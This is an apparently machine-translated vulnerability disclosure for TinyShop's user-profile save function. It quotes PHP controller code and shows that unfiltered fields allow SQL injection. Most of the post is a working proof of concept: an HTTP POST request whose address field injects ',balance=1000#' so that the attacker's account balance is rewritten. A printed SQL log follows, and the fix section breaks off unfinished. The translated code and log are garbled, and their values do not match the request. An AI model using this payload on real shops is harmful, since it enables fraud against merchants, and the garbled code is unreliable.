Tinyshop money scalping Vulnerability

Tinyshop money scalping Vulnerability

I saw a money-flushing vulnerability before, but it was enough. Later I saw it.. I only fixed the bug where the previous post overwrites the data array.


/Protected/controllers/ucenter. php, Row 3

Public function info_save () {$ rules = array ('name: required: nickname cannot be blank! ', 'Real _ name: required: The real name cannot be blank! ', 'Sex: int: gender required! ', 'Birthday: date: the format of the birthday date is incorrect! ', 'Mobile: mobi: Incorrect mobile phone format', 'phone: phone: Incorrect phone format '); $ info = Validator: check ($ rules ); if (is_array ($ info) {$ this-> redirect ("info", false, array ('msg '=> array ("info ", $ info ['msg ']);} else {$ data = array ('name' => Filter: str (Req: args ('name ')), 'Real _ name' => Filter: str (Req: args ('real _ name'), 'sex' => Filter: int (Req :: args ('sex'), 'birthday' => Req: args ('birthday'), 'mobile' => Req: args ('mobile '), 'Phone '=> Req: args ('phone'), 'vince '=> Req: args ('province'), 'city' => Req :: args ('city'), 'county '=> Req: args ('county'), 'addr '=> Filter: text (Req :: args ('addr ');} $ name = Filter: SQL (Req: args ("name ")); $ id = $ this-> user ['id']; $ this-> model-> table ("user ") -> data (array ("name" => $ name)-> where ("id = $ id")-> update (); $ this-> model-> table ("customer")-> data ($ data)-> where ("user_id = $ id")-> update (); $ obj = $ this-> model-> table ("user as us")-> join ("left join customer as cu on us. id = cu. user_id ")-> fields (" us. *, cu. group_id, cu. login_time ")-> where (" us. id = $ id ")-> find (); $ this-> safebox-> set ('user', $ obj, $ this-> cookie_time ); $ this-> redirect ("info ");}

From the above, the filtering in the following areas is problematic.

'birthday'=>Req::args('birthday'),                    'mobile'=>Req::args('mobile'),                    'phone'=>Req::args('phone'),                    'province'=>Req::args('province'),                    'city'=>Req::args('city'),                    'county'=>Req::args('county'),                    'addr'=>Filter::text(Req::args('addr'))

This can cause injection, but we do not care about this because the banlance field of the user account balance is also in this table, so we can use the update operation to clear money for ourselves, instead of using this injection for blind injection.
 

Proof of vulnerability:

Poc:

POST /tinyshop/index.php?con=ucenter&act=info_save HTTP/1.1Host: localhostUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateDNT: 1Referer: http://localhost/tinyshop/index.php?con=ucenter&act=infoCookie: CNZZDATA80862620=cnzz_eid%3D163438544-1407551214-http%253A%252F%252Flocalhost%252F%26ntime%3D1408007142; bdshare_firstime=1407551237892; tm_ibc=0; ZDEDebuggerPresent=php,phtml,php3; CNZZDATA1670348=cnzz_eid%3D2114245156-1409299086-http%253A%252F%252Flocalhost%252F%26ntime%3D1409299086; ver=free; PHPSESSID=f2943c79c9d287ef2a0136f0525e9fb3; language=5ad2ae3c20c17a82d4b61aaa71f61e05f5b4a0a2s%3A5%3A%22zh_cn%22%3B; 1_product=f5de13e802a02fac20482edfe9ee2d303641bc6ds%3A1%3A%221%22%3B; pageSize=7fe99f844d5233ed16ab2d46f0b885fe7b213e04s%3A2%3A%2220%22%3B; safecode=1; Tiny_autologin=ed6460c9a8OTU2Nzg2NTAwMmFiNDQ9NTsyMzBjOGJlNjAyZjJlY2cConnection: keep-aliveContent-Type: application/x-www-form-urlencodedContent-Length: 161name=test1%40qq.com&real_name=1&sex=0&birthday=2014-09-30&mobile=13900000001&phone=13222222222&province=420000&city=421300&county=421301&addr=111111',balance=1000#

SQL query log:

187323 Query update tiny_customer set 'real _ name' = '1', 'sex' = 0, 'birthday' = '2017-09-30 ', 'mobile' = '2017030 ', 'Phone '= '2008080', 'vince' = 13222222222, 'city' = 420000, 'county '= 421300, 'add' = '2016 ', balance = 1000 # 'where user_id = 4

 

Look at the results:
 

 

Solution:

Change